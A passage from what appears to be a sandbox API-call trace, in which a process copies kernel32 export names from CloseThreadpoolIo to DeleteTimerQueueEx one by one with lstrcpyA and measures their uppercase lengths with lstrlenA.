returned="CloseThreadpoolCleanupGroupMembers" [0084.863] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.863] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.863] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.864] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.864] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.864] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.864] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.864] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.864] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.864] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.864] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.864] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.864] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.864] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.864] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.864] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.864] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.864] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.864] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.864] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.864] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.864] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.865] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.865] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.865] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.865] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.865] lstrlenA (lpString="COPYFILEA") returned 9 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.865] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.865] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.865] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.865] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.865] lstrlenA (lpString="COPYFILEW") returned 9 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.865] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.865] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.865] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.865] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.865] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.865] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.865] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.865] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.865] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.866] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.866] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.866] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.866] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.866] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.866] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.866] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.866] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.866] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.866] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.866] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.866] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.866] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.866] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.866] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.866] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.866] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.866] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.866] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.867] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.867] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.867] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.867] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.867] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.867] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.867] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.867] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.867] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.867] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.867] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.867] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.867] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.867] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.867] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.867] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.867] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.867] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.867] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.867] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.868] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.868] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.868] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.868] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.868] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.868] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.868] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.868] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.868] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.868] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.868] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.868] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.868] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.868] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.868] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.868] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.868] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.868] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.868] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.869] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.869] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.869] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.869] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.869] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.869] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.869] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.869] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.869] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.869] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.869] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.869] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.869] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.869] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.869] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.869] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.869] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.869] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.869] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.869] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.870] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.870] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.870] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.870] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.870] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.870] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.870] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.870] lstrlenA (lpString="DELETEATOM") returned 10 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.870] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.870] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.870] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.870] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.870] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.870] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.870] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.870] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.870] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.870] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.871] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.871] lstrcpyA (in: 